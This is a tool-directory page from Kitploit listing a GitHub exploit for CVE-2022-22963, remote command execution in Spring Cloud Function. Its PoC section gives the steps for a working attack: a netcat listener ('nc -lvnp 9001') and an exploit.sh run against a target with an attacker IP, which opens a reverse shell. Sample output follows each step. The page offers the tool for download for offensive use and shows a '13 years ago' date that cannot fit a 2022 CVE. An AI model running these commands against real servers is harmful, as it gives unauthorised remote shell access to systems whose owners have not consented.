Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
RCE-in-Spring-Cloud-CVE-2022-22963 — Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function | Kitploit
Tools/GitHubGitHub/nikn0laty/rce-in-spring-cloud-cve-2022-22963
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubnikn0laty/rce-in-spring-cloud-cve-2022-22963

RCE-in-Spring-Cloud-CVE-2022-22963

Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
13 years agoNot yet reviewed

Exploit for RCE in Spring Cloud (CVE 2022-22963)

Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function

See for details about the vulnerability here and here

PoC

Run the netcat on your host:

root@kitploit:~
$ nc -lvnp 9001

Run the exploit (example) with default port 9001 on attacker host:

root@kitploit:~
$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Done

Run the exploit (example) with the specified port 1337 on attacker host:

root@kitploit:~
$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Done
Download Tool